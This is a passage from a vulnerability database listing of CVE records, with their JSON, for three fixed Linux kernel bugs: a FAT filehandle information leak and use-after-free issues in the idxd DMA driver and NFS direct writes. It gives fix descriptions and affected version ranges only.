In the Linux kernel, the following vulnerability has been resolved: fat: fix uninitialized field in nostale filehandles When fat_encode_fh_nostale() encodes file handle without a parent it stores only first 10 bytes of the file handle. However the length of the file handle must be a multiple of 4 so the file handle is actually 12 bytes long and the last two bytes remain uninitialized. This is not great at we potentially leak uninitialized information with the handle to userspace. Properly initialize the full handle length.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/9840d1897e28f8733…
	https://git.kernel.org/stable/c/f52d7663a10a1266a…
	https://git.kernel.org/stable/c/a276c595c3a629170…
	https://git.kernel.org/stable/c/b7fb63e807c6dadf7…
	https://git.kernel.org/stable/c/c8cc05de8e6b5612b…
	https://git.kernel.org/stable/c/03a7e3f2ba3ca25f1…
	https://git.kernel.org/stable/c/74f852654b8b7866f…
	https://git.kernel.org/stable/c/cdd33d54e789d229d…
	https://git.kernel.org/stable/c/fde2497d2bc3a063d…

Impacted products

Vendor

Product

Version

Linux

Affected: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 , < 9840d1897e28f8733cc1e38f97e044f987dc0a63 (git)
Affected: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 , < f52d7663a10a1266a2d3871a6dd8fd111edc549f (git)
Affected: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 , < a276c595c3a629170b0f052a3724f755d7c6adc6 (git)
Affected: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 , < b7fb63e807c6dadf7ecc1d43448c4f1711d7eeee (git)
Affected: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 , < c8cc05de8e6b5612b6e9f92c385c1a064b0db375 (git)
Affected: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 , < 03a7e3f2ba3ca25f1da1d3898709a08db14c1abb (git)
Affected: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 , < 74f852654b8b7866f15323685f1e178d3386c688 (git)
Affected: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 , < cdd33d54e789d229d6d5007cbf3f53965ca1a5c6 (git)
Affected: ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2 , < fde2497d2bc3a063d8af88b258dbadc86bd7b57c (git)

Linux

Affected: 3.10
Unaffected: 0 , < 3.10 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.673Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9840d1897e28f8733cc1e38f97e044f987dc0a63"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f52d7663a10a1266a2d3871a6dd8fd111edc549f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a276c595c3a629170b0f052a3724f755d7c6adc6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b7fb63e807c6dadf7ecc1d43448c4f1711d7eeee"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c8cc05de8e6b5612b6e9f92c385c1a064b0db375"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03a7e3f2ba3ca25f1da1d3898709a08db14c1abb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/74f852654b8b7866f15323685f1e178d3386c688"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cdd33d54e789d229d6d5007cbf3f53965ca1a5c6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fde2497d2bc3a063d8af88b258dbadc86bd7b57c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26973",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:45:13.490208Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:44.022Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/fat/nfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "9840d1897e28f8733cc1e38f97e044f987dc0a63",
              "status": "affected",
              "version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
              "versionType": "git"
            },
            {
              "lessThan": "f52d7663a10a1266a2d3871a6dd8fd111edc549f",
              "status": "affected",
              "version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
              "versionType": "git"
            },
            {
              "lessThan": "a276c595c3a629170b0f052a3724f755d7c6adc6",
              "status": "affected",
              "version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
              "versionType": "git"
            },
            {
              "lessThan": "b7fb63e807c6dadf7ecc1d43448c4f1711d7eeee",
              "status": "affected",
              "version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
              "versionType": "git"
            },
            {
              "lessThan": "c8cc05de8e6b5612b6e9f92c385c1a064b0db375",
              "status": "affected",
              "version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
              "versionType": "git"
            },
            {
              "lessThan": "03a7e3f2ba3ca25f1da1d3898709a08db14c1abb",
              "status": "affected",
              "version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
              "versionType": "git"
            },
            {
              "lessThan": "74f852654b8b7866f15323685f1e178d3386c688",
              "status": "affected",
              "version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
              "versionType": "git"
            },
            {
              "lessThan": "cdd33d54e789d229d6d5007cbf3f53965ca1a5c6",
              "status": "affected",
              "version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
              "versionType": "git"
            },
            {
              "lessThan": "fde2497d2bc3a063d8af88b258dbadc86bd7b57c",
              "status": "affected",
              "version": "ea3983ace6b79c96e6ab3d3837e2eaf81ab881e2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/fat/nfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.10"
            },
            {
              "lessThan": "3.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfat: fix uninitialized field in nostale filehandles\n\nWhen fat_encode_fh_nostale() encodes file handle without a parent it\nstores only first 10 bytes of the file handle. However the length of the\nfile handle must be a multiple of 4 so the file handle is actually 12\nbytes long and the last two bytes remain uninitialized. This is not\ngreat at we potentially leak uninitialized information with the handle\nto userspace. Properly initialize the full handle length."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:14.685Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/9840d1897e28f8733cc1e38f97e044f987dc0a63"
        },
        {
          "url": "https://git.kernel.org/stable/c/f52d7663a10a1266a2d3871a6dd8fd111edc549f"
        },
        {
          "url": "https://git.kernel.org/stable/c/a276c595c3a629170b0f052a3724f755d7c6adc6"
        },
        {
          "url": "https://git.kernel.org/stable/c/b7fb63e807c6dadf7ecc1d43448c4f1711d7eeee"
        },
        {
          "url": "https://git.kernel.org/stable/c/c8cc05de8e6b5612b6e9f92c385c1a064b0db375"
        },
        {
          "url": "https://git.kernel.org/stable/c/03a7e3f2ba3ca25f1da1d3898709a08db14c1abb"
        },
        {
          "url": "https://git.kernel.org/stable/c/74f852654b8b7866f15323685f1e178d3386c688"
        },
        {
          "url": "https://git.kernel.org/stable/c/cdd33d54e789d229d6d5007cbf3f53965ca1a5c6"
        },
        {
          "url": "https://git.kernel.org/stable/c/fde2497d2bc3a063d8af88b258dbadc86bd7b57c"
        }
      ],
      "title": "fat: fix uninitialized field in nostale filehandles",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26973",
    "datePublished": "2024-05-01T05:20:09.420Z",
    "dateReserved": "2024-02-19T14:20:24.203Z",
    "dateUpdated": "2025-05-04T09:01:14.685Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40956 (GCVE-0-2024-40956)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:31 – Updated: 2025-11-03 21:58

Title

dmaengine: idxd: Fix possible Use-After-Free in irq_process_work_list

Summary

In the Linux kernel, the following vulnerability has been resolved: dmaengine: idxd: Fix possible Use-After-Free in irq_process_work_list Use list_for_each_entry_safe() to allow iterating through the list and deleting the entry in the iteration process. The descriptor is freed via idxd_desc_complete() and there's a slight chance may cause issue for the list iterator when the descriptor is reused by another thread without it being deleted from the list.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1b08bf5a17c66ab7d…
	https://git.kernel.org/stable/c/83163667d881100a4…
	https://git.kernel.org/stable/c/faa35db78b058a2ab…
	https://git.kernel.org/stable/c/a14968921486793f2…
	https://git.kernel.org/stable/c/e3215deca4520773c…

Impacted products

Vendor

Product

Version

Linux

Affected: 16e19e11228ba660d9e322035635e7dcf160d5c2 , < 1b08bf5a17c66ab7dbb628df5344da53c8e7ab33 (git)
Affected: 16e19e11228ba660d9e322035635e7dcf160d5c2 , < 83163667d881100a485b6c2daa30301b7f68d9b5 (git)
Affected: 16e19e11228ba660d9e322035635e7dcf160d5c2 , < faa35db78b058a2ab6e074ee283f69fa398c36a8 (git)
Affected: 16e19e11228ba660d9e322035635e7dcf160d5c2 , < a14968921486793f2a956086895c3793761309dd (git)
Affected: 16e19e11228ba660d9e322035635e7dcf160d5c2 , < e3215deca4520773cd2b155bed164c12365149a7 (git)

Linux

Affected: 5.11
Unaffected: 0 , < 5.11 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:58:20.070Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1b08bf5a17c66ab7dbb628df5344da53c8e7ab33"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/83163667d881100a485b6c2daa30301b7f68d9b5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/faa35db78b058a2ab6e074ee283f69fa398c36a8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a14968921486793f2a956086895c3793761309dd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e3215deca4520773cd2b155bed164c12365149a7"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40956",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:03:42.094021Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:24.154Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma/idxd/irq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1b08bf5a17c66ab7dbb628df5344da53c8e7ab33",
              "status": "affected",
              "version": "16e19e11228ba660d9e322035635e7dcf160d5c2",
              "versionType": "git"
            },
            {
              "lessThan": "83163667d881100a485b6c2daa30301b7f68d9b5",
              "status": "affected",
              "version": "16e19e11228ba660d9e322035635e7dcf160d5c2",
              "versionType": "git"
            },
            {
              "lessThan": "faa35db78b058a2ab6e074ee283f69fa398c36a8",
              "status": "affected",
              "version": "16e19e11228ba660d9e322035635e7dcf160d5c2",
              "versionType": "git"
            },
            {
              "lessThan": "a14968921486793f2a956086895c3793761309dd",
              "status": "affected",
              "version": "16e19e11228ba660d9e322035635e7dcf160d5c2",
              "versionType": "git"
            },
            {
              "lessThan": "e3215deca4520773cd2b155bed164c12365149a7",
              "status": "affected",
              "version": "16e19e11228ba660d9e322035635e7dcf160d5c2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/dma/idxd/irq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.11"
            },
            {
              "lessThan": "5.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: Fix possible Use-After-Free in irq_process_work_list\n\nUse list_for_each_entry_safe() to allow iterating through the list and\ndeleting the entry in the iteration process. The descriptor is freed via\nidxd_desc_complete() and there\u0027s a slight chance may cause issue for\nthe list iterator when the descriptor is reused by another thread\nwithout it being deleted from the list."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:18:44.775Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1b08bf5a17c66ab7dbb628df5344da53c8e7ab33"
        },
        {
          "url": "https://git.kernel.org/stable/c/83163667d881100a485b6c2daa30301b7f68d9b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/faa35db78b058a2ab6e074ee283f69fa398c36a8"
        },
        {
          "url": "https://git.kernel.org/stable/c/a14968921486793f2a956086895c3793761309dd"
        },
        {
          "url": "https://git.kernel.org/stable/c/e3215deca4520773cd2b155bed164c12365149a7"
        }
      ],
      "title": "dmaengine: idxd: Fix possible Use-After-Free in irq_process_work_list",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40956",
    "datePublished": "2024-07-12T12:31:59.027Z",
    "dateReserved": "2024-07-12T12:17:45.593Z",
    "dateUpdated": "2025-11-03T21:58:20.070Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26958 (GCVE-0-2024-26958)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:19 – Updated: 2025-08-28 14:42

Title

nfs: fix UAF in direct writes

Summary

In the Linux kernel, the following vulnerability has been resolved: nfs: fix UAF in direct writes In production we have been hitting the following warning consistently ------------[ cut here ]------------ refcount_t: underflow; use-after-free. WARNING: CPU: 17 PID: 1800359 at lib/refcount.c:28 refcount_warn_saturate+0x9c/0xe0 Workqueue: nfsiod nfs_direct_write_schedule_work [nfs] RIP: 0010:refcount_warn_saturate+0x9c/0xe0 PKRU: 55555554 Call Trace: <TASK> ? __warn+0x9f/0x130 ? refcount_warn_saturate+0x9c/0xe0 ? report_bug+0xcc/0x150 ? handle_bug+0x3d/0x70 ? exc_invalid_op+0x16/0x40 ? asm_exc_invalid_op+0x16/0x20 ? refcount_warn_saturate+0x9c/0xe0 nfs_direct_write_schedule_work+0x237/0x250 [nfs] process_one_work+0x12f/0x4a0 worker_thread+0x14e/0x3b0 ? ZSTD_getCParams_internal+0x220/0x220 kthread+0xdc/0x120 ? __btf_name_valid+0xa0/0xa0 ret_from_fork+0x1f/0x30 This is because we're completing the nfs_direct_request twice in a row. The source of this is when we have our commit requests to submit, we process them and send them off, and then in the completion path for the commit requests we have if (nfs_commit_end(cinfo.mds)) nfs_direct_write_complete(dreq); However since we're submitting asynchronous requests we sometimes have one that completes before we submit the next one, so we end up calling complete on the nfs_direct_request twice. The only other place we use nfs_generic_commit_list() is in __nfs_commit_inode, which wraps this call in a nfs_commit_begin(); nfs_commit_end(); Which is a common pattern for this style of completion handling, one that is also repeated in the direct code with get_dreq()/put_dreq() calls around where we process events as well as in the completion paths. Fix this by using the same pattern for the commit requests. Before with my 200 node rocksdb stress running this warning would pop every 10ish minutes. With my patch the stress test has been running for several hours without popping.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6cd3f13aaa62970b5…
	https://git.kernel.org/stable/c/4595d90b5d2ea5fa4…
	https://git.kernel.org/stable/c/80d24b308b7ee7037…
	https://git.kernel.org/stable/c/3abc2d160ed821394…
	https://git.kernel.org/stable/c/e25447c35f8745337…
	https://git.kernel.org/stable/c/1daf52b5ffb24870f…
	https://git.kernel.org/stable/c/cf54f66e1dd78990e…
	https://git.kernel.org/stable/c/17f46b803d4f23c66…

Impacted products

Vendor

Product

Version

Linux

Affected: af7cf057933f01dc7f33ddfb5e436ad598ed17ad , < 6cd3f13aaa62970b5169d990e936b2e96943bc6a (git)
Affected: af7cf057933f01dc7f33ddfb5e436ad598ed17ad , < 4595d90b5d2ea5fa4d318d13f59055aa4bf3e7f5 (git)
Affected: af7cf057933f01dc7f33ddfb5e436ad598ed17ad , < 80d24b308b7ee7037fc90d8ac99f6f78df0a256f (git)
Affected: af7cf057933f01dc7f33ddfb5e436ad598ed17ad , < 3abc2d160ed8213948b147295d77d44a22c88fa3 (git)
Affected: af7cf057933f01dc7f33ddfb5e436ad598ed17ad , < e25447c35f8745337ea8bc0c9697fcac14df8605 (git)
Affected: af7cf057933f01dc7f33ddfb5e436ad598ed17ad , < 1daf52b5ffb24870fbeda20b4967526d8f9e12ab (git)
Affected: af7cf057933f01dc7f33ddfb5e436ad598ed17ad , < cf54f66e1dd78990ec6b32177bca7e6ea2144a95 (git)
Affected: af7cf057933f01dc7f33ddfb5e436ad598ed17ad , < 17f46b803d4f23c66cacce81db35fef3adb8f2af (git)

Linux

Affected: 4.5
Unaffected: 0 , < 4.5 (semver)
Unaffected: 5.4.297 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26958",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-01T13:37:27.589314Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:10.748Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.688Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4595d90b5d2ea5fa4d318d13f59055aa4bf3e7f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/80d24b308b7ee7037fc90d8ac99f6f78df0a256f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3abc2d160ed8213948b147295d77d44a22c88fa3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e25447c35f8745337ea8bc0c9697fcac14df8605"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1daf52b5ffb24870fbeda20b4967526d8f9e12ab"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cf54f66e1dd78990ec6b32177bca7e6ea2144a95"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17f46b803d4f23c66cacce81db35fef3adb8f2af"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nfs/direct.c",
            "fs/nfs/write.c",
            "include/linux/nfs_fs.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6cd3f13aaa62970b5169d990e936b2e96943bc6a",
              "status": "affected",
              "version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
              "versionType": "git"
            },
            {
              "lessThan": "4595d90b5d2ea5fa4d318d13f59055aa4bf3e7f5",
              "status": "affected",
              "version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
              "versionType": "git"
            },
            {
              "lessThan": "80d24b308b7ee7037fc90d8ac99f6f78df0a256f",
              "status": "affected",
              "version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
              "versionType": "git"
            },
            {
              "lessThan": "3abc2d160ed8213948b147295d77d44a22c88fa3",
              "status": "affected",
              "version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
              "versionType": "git"
            },
            {
              "lessThan": "e25447c35f8745337ea8bc0c9697fcac14df8605",
              "status": "affected",
              "version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
              "versionType": "git"
            },
            {
              "lessThan": "1daf52b5ffb24870fbeda20b4967526d8f9e12ab",
              "status": "affected",
              "version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
              "versionType": "git"
            },
            {
              "lessThan": "cf54f66e1dd78990ec6b32177bca7e6ea2144a95",
              "status": "affected",
              "version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
              "versionType": "git"
            },
            {
              "lessThan": "17f46b803d4f23c66cacce81db35fef3adb8f2af",
              "status": "affected",
              "version": "af7cf057933f01dc7f33ddfb5e436ad598ed17ad",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nfs/direct.c",
            "fs/nfs/write.c",
            "include/linux/nfs_fs.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
